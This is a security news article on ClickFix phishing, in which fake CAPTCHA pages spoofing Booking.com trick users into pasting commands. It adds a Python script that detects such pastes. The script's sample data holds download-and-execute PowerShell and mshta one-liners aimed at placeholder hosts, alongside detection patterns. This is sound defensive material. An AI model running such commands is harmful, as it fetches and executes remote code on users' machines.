This Dangerous Email Tricks You Into Hacking Your Own PC

Be cautious when browsing the internet and reading your inbox, as a new wave of "scam yourself" attacks has been making the rounds. These phishing emails do not carry a malicious attachment or exploit; they have been tricking people into compromising their own computers by hand.

The ClickFix attack is a cleverly designed scam that begins with users being lured, by an emailed link or from a seemingly legitimate but compromised website, to a page showing a fake popup window, typically a bogus CAPTCHA or error dialog. That page places a command on the clipboard and instructs the visitor to open a Windows prompt such as the Run dialog or a PowerShell window, paste, and press Enter. This "sophisticated form of social engineering" manipulates users into executing the malicious script themselves, so the attacker never needs a vulnerability in the browser or a file download to get code running.

One particularly devious example has been identified by Cofense, which targets businesses in the travel industry. The email purports to be from market giant Booking.com, warning that a customer has made a serious complaint and giving the recipient a time-boxed opportunity to respond using the link provided.

"These campaigns generally provide Booking.com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers," says Cofense. The campaign "preys on the recipient's fear of leaving a guest dissatisfied" and might "claim that a guest was trying to contact the hotel but was unable to get a response."

Not all these lures are negative: some pose as requests or questions from future (imaginary) guests, again with a link for the hotel operator to respond. Whatever the pretext, the attack that follows is the same as all the others.

The emails used in these campaigns will sometimes state that the embedded link only works on Windows computers, simply because the malware delivered only infects Windows PCs. But the most blatant tell is the CAPTCHA "Robot or Human?" challenge, which instructs the user to open a Windows prompt, paste in the text the page has already placed on the PC's clipboard, and then press Enter.

"Absent a few wording changes, there is no variation in this part of the attack," says Cofense. "It's the most blatant tell." So, what should you do if you receive one of these emails? In theory, at least, you now know better, but cybercriminals will keep trying nonetheless.
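Because that paste-and-Enter step never varies, it leaves a consistent footprint that defenders can hunt for: a user-facing process (the Run dialog lives in explorer.exe, or an open console) spawning a scripting interpreter with a hidden-window flag, a download-and-execute cradle, or a trailing comment echoing the CAPTCHA text. The following is an added example, not code from the article, Booking.com or Cofense. It scores command lines for those traits and applies the score to constructed Sysmon-style process-creation records and to RunMRU registry values, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer to record what a user typed into Win+R. The field names, indicator weights, threshold and every sample record are assumptions for illustration.

```python
"""ClickFix triage over process-creation telemetry and Run-dialog history.

Added example for this article, not code from the article or from Cofense.
Field names, weights, the indicator list and all sample data are constructed
assumptions; tune them against your own baseline before deploying anything.
"""
import re

# Interpreters a pasted ClickFix one-liner typically launches (assumption:
# illustrative, not exhaustive).
CHILD_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Parents that mean a person typed or pasted the command: the Run dialog is
# hosted by explorer.exe, an already-open console by cmd.exe or PowerShell.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

# (regex, label, weight). Weights are an assumption: a remote HTA or a comment
# echoing the CAPTCHA text is strong on its own; a bypass flag is weak alone
# because administrators use it legitimately.
INDICATORS = [
    (r"(?i)-(?:w|win|window|windowstyle)\s+h(?:idden)?\b", "hidden window", 1),
    (r"(?i)-(?:ep|exec|executionpolicy)\s+bypass\b", "execution policy bypass", 1),
    (r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command", 2),
    (r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b",
     "download cradle", 2),
    (r"(?i)\b(?:iex|invoke-expression)\b", "inline execution", 1),
    (r"(?i)\bmshta(?:\.exe)?\b.*https?://", "remote HTA", 3),
    (r"(?i)#.*(?:not a robot|human|captcha|verif)", "CAPTCHA-style trailing comment", 3),
]
ALERT_THRESHOLD = 3  # assumption: a single strong indicator is enough to alert


def score_command(cmdline):
    """Return (total_weight, matched_labels) for one command line."""
    hits = [(label, weight) for pattern, label, weight in INDICATORS
            if re.search(pattern, cmdline)]
    return sum(weight for _, weight in hits), [label for label, _ in hits]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage_process_event(event):
    """Score a Sysmon-like Event ID 1 record. Scores 0 unless an interactive
    parent spawned a scripting interpreter, which is the shape a paste has."""
    if _basename(event.get("Image", "")) not in CHILD_INTERPRETERS:
        return 0, []
    if _basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return 0, []
    return score_command(event.get("CommandLine", ""))


def hunt(events, threshold=ALERT_THRESHOLD):
    """Return [(ProcessId, score)] for records at or above the threshold."""
    flagged = []
    for event in events:
        score, _ = triage_process_event(event)
        if score >= threshold:
            flagged.append((event["ProcessId"], score))
    return flagged


def triage_runmru(values, threshold=ALERT_THRESHOLD):
    """Score RunMRU values (name -> 'command\\1'); MRUList only holds ordering."""
    flagged = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw  # strip the \1 suffix
        score, _ = score_command(command)
        if score >= threshold:
            flagged.append((name, score))
    return flagged


# Constructed sample telemetry (not real logs); hosts use the reserved .invalid TLD.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {   # pasted into Win+R from a fake "Robot or Human?" page
        "ProcessId": "4412", "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
        "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/verify | iex" '
                       "# I am not a robot - Verification ID: 8821",
    },
    {   # interactive but benign
        "ProcessId": "4420", "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
        "CommandLine": "powershell.exe -NoExit -Command Get-Process",
    },
    {   # admin running a script with a bypass flag: weak signal on its own
        "ProcessId": "4501", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    },
    {   # same flags under a service parent: not a paste, another detection's job
        "ProcessId": "612", "ParentImage": "C:\\Program Files\\Agent\\agent.exe", "Image": PS,
        "CommandLine": "powershell.exe -w hidden -enc " + "Q" * 40,
    },
    {   # mshta variant of the same lure
        "ProcessId": "5120", "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\mshta.exe",
        "CommandLine": "mshta.exe https://example.invalid/robot-check/index.hta",
    },
]

SAMPLE_RUNMRU = {
    "a": 'powershell -w hidden -ep bypass -c "irm https://example.invalid/v | iex" # I am not a robot\\1',
    "b": "notepad\\1",
    "MRUList": "ab",
}

if __name__ == "__main__":
    print("process events:", hunt(SAMPLE_EVENTS))   # [('4412', 8), ('5120', 3)]
    print("RunMRU:", triage_runmru(SAMPLE_RUNMRU))  # [('a', 8)]
```

Two caveats worth knowing when you adapt this. First, the parent filter is what keeps the false-positive rate tolerable: the same hidden-window and encoded-command flags appear constantly under management agents and scheduled tasks, which is a different hunt. Second, if the victim pastes the raw script into an already-open PowerShell console rather than running `powershell.exe ...` from Win+R, no child process is created at all; in that case PowerShell Script Block Logging (Event ID 4104) is where the pasted text shows up, and the same `score_command` heuristic can be run over those script blocks.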

Once you know about ClickFix, it's essential to be vigilant and never paste text that a web page or email told you to copy into a Run dialog, terminal or PowerShell window and hit Enter. Whether the pretext is a CAPTCHA, a "secure" website or a document that needs unlocking, or a technical fault to fix, it's always an attack, and the hacker is always you. Remember, if an email seems too good (or bad) to be true, it probably is.
